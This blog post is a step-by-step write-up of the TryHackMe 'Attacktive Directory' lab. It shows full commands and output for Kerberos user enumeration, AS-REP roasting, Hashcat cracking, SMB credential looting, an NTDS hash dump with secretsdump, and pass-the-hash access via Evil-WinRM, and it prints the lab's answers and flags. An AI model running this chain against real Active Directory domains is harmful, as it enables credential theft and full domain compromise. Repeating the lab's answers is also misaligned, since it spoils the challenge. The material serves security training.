Hi everyone! Today's post is on a TryHackMe challenge on Attacktive Directory that will introduce to u Kerberos user enumeration using Kerbrute on Domain Controller (DC), AS-REP Roasting using GetNPUsers on DC, Hashcat to crack Kerberos hashes, dumping password hashes from DC, and using Evil-WinRM to access the DC. Let's get started!
1. Deploy the machine
You can use Kali Linux, Parrot OS, or TryHackMe (THM)'s attack machine to attack the Domain Controller (DC).
2. Setup
Impacket installation
Impacket has always been very difficult to install correctly. Any missing steps often result in a brunch of errors when running tools from Impacket. Thus, TryHackMe (THM) provided us steps to install correctly. If you are using THM's attack machine, Impacket and Bloodhound have already been installed.
Firstly, we have to clone Impacket from the GitHub repository.
kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Next, we shall install the requirements.
kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt
Finally, we can run the Python installation script.
kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install
2. Welcome to Active Directory
We first have to use nmap to check out the services available on the Domain Controller (DC). In this simple lab setup, there is only the DC available. Of course with different Active Directory (AD) environments, we may have to enumerate and attack other workstations before we have a shot to access the DC.
kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165 [sudo] password for kali: Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST Nmap scan report for 10.10.139.4 Host is up (0.36s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-12T07:18:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-11T06:34:36
|_Not valid after: 2022-07-13T06:34:36
|_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
We can also use enum4linux on port 139/445 to enumerate the NetBIOS for information such as the existing usernames, NetBIOS-Domain Name, SID, etc.
kali@kali~$ enum4linux 10.10.6.165 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022 ========================== | Target Information | ========================== Target ........... 10.10.6.165 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================== | Enumerating Workgroup/Domain on 10.10.6.165 | =================================================== [E] Can't find workgroup/domain =========================================== | Nbtstat Information for 10.10.6.165 | =========================================== Looking up status of 10.10.6.165 No reply from 10.10.6.165 ==================================== | Session Check on 10.10.6.165 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 10.10.139.4 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: ========================================== | Getting domain SID for 10.10.6.165 | ========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: THM-AD Domain Sid: S-1-5-21-3591857110-2884097990-301047963 [+] Host is part of a domain (not a workgroup) ...
Questions and answers
What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
.local
4. Enumerating Users via Kerberos
Based on TryHackMe (THM), we are recommended to use Kerbrute for this challenge to brute force Kerberos (key authentication service in Active Directory) to enumerate usernames and passwords. A modified username list and password list have been given to us. Note that it is actually not recommended to brute force credentials due to account lockout policies.
Firstly, I downloaded Kerbrute into my Kali and change its execution permission.
kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 kali@kali~$ chmod +x kerbrute_linux_amd64
Next, I downloaded both the user list and password list.
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
We can now check out the usage of the tool and use it on the Domain Controller (DC).
kali@kali~$ ./kerbrute_linux_amd64 --help ... Usage: kerbrute [command] Available Commands: bruteforce Bruteforce username:password combos, from a file or stdin bruteuser Bruteforce a single user's password from a wordlist help Help about any command passwordspray Test a single password against a list of users userenum Enumerate valid domain usernames via Kerberos version Display version info and quit Flags: --dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS --delay int Delay in millisecond between each attempt. Will always use single thread if set -d, --domain string The full domain to use (e.g. contoso.com) -h, --help help for kerbrute -o, --output string File to write logs to. Optional. --safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE -t, --threads int Threads to use (default 10) -v, --verbose Log failures and errors kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local. userlist.txt ... Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop 2022/01/11 22:53:06 > Using KDC(s): 2022/01/11 22:53:06 > 10.10.6.165:88 2022/01/11 22:53:07 > [+] VALID USERNAME: james@spookysec.local. 2022/01/11 22:53:13 > [+] VALID USERNAME: svc-admin@spookysec.local. 2022/01/11 22:53:21 > [+] VALID USERNAME: James@spookysec.local. 2022/01/11 22:53:24 > [+] VALID USERNAME: robin@spookysec.local. 2022/01/11 22:53:54 > [+] VALID USERNAME: darkstar@spookysec.local. 2022/01/11 22:54:13 > [+] VALID USERNAME: administrator@spookysec.local. 2022/01/11 22:54:50 > [+] VALID USERNAME: backup@spookysec.local. 2022/01/11 22:55:08 > [+] VALID USERNAME: paradox@spookysec.local.
Questions and answers
What command within Kerbrute will allow us to enumerate valid usernames?
userenum
What notable account is discovered? (These should jump out at you)
svc-admin
What is the other notable account is discovered? (These should jump out at you)
backup
5. Abusing Kerberos
In this challenge, we can ASREPRoasting as a user account or more do not require pre-authentication details before requesting a Kerberos Ticket. Thus, we can use Impacket's /opt/impacket/examples/GetNPUsers.py to query ASReproastable accounts from the Key Distribution Center. However, we will need to provide a list of usernames. Since previously we already brute force the list of usernames, we can use those usernames.
In my validusers.txt:
james svc-admin James robin darkstar administrator backup paradox
Obtaining ASReproastable accounts.
kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/ Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation [-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566 [-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
We can see that only svc-admin can request a ticket without a need to provide its password.
A quick google will allow us to find out we should use mode 18200 to crack the hash.
kali@kali~$ hashcat -h | grep 18200 18200 | Kerberos 5, etype 23, AS-REP | Network Protocols
Finally, we can attempt to crack the password of svc-admin using hashcat. I first store the hash in hash.txt before cracking it with the password list provided previously.
kali@kali~$ cat hash.txt $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566 kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt ... $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005
It should only take a few seconds to crack the hash on a virtual machine Kali. If you do it on your Windows host, it will be even faster. We should obtain the password "management2005".
Questions and answers
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
What mode is the hash?
18200
Now crack the hash with the modified password list provided, what is the user accounts password?
management2005
6. Back to the Basics
We can now attempt to enumerate SMB shared folders using our newly found credentials.
kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin" Enter WORKGROUP\svc-admin's password: management2005 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backup Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share
Going through each shared folder, I found an interesting folder to which I can login and see an interesting text file.
kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin" Enter WORKGROUP\svc-admin's password: management2005 Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Apr 4 15:08:39 2020 .. D 0 Sat Apr 4 15:08:39 2020 backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
I downloaded the text file and looked at its content.
smb: \> get backup_credentials.txt getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \> exit kali@kali~$ cat backup_credentials.txt YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
It looks like it is base64 encoded. Thus, decoding it allows us to see a valid credential.
kali@kali~$ base64 -d backup_credentials.txt backup@spookysec.local:backup2517860
Questions and answers
What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup
What is the content of the file?
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:backup2517860
7. Elevating Privileges within the Domain
Obtaining the credentials of backup allows us to have more privileges as the backup account in a Domain Controller (DC) This is because any changes to the Active Directory (AD) will reflect those changes in this backup account. As a result, we can obtain every user's password hashes. To do so, we can use Impacket's secretsdump.py.
kali@kali~$ python3 /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.6.165 Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21::: spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b::: spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e::: spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b::: spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7::: spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::: spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb::: spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2::: spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705::: spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664::: spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809::: spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538::: spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::
Finally, we will need to install evil-winrm to access the system since port 5985 for WinRM is open.
kali@kali~$ sudo gem install evil-winrm
Questions and answers
What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrators NTLM hash?
0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
pass the hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
-H
8. Flag submission panel
Submit the flags for each user account. They can be located on each user's desktop. We can just login into the administrator's account which have access to other users' desktops.
kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc ... *Evil-WinRM* PS C:\Users\Administrator\Documents>
We can now access each users's desktop to obtain their hash.
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop *Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir Directory: C:\Users\svc-admin\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 12:18 PM 28 user.txt.txt *Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt TryHackMe{K3rb3r0s_Pr3_4uth} *Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop *Evil-WinRM* PS C:\Users\backup\Desktop> dir Directory: C:\Users\backup\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 12:19 PM 26 PrivEsc.txt *Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt TryHackMe{B4ckM3UpSc0tty!} *Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 11:39 AM 32 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt TryHackMe{4ctiveD1rectoryM4st3r}
Questions and answers
svc-admin
TryHackMe{K3rb3r0s_Pr3_4uth}
backup
TryHackMe{B4ckM3UpSc0tty!}
Administrator
TryHackMe{4ctiveD1rectoryM4st3r}
I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.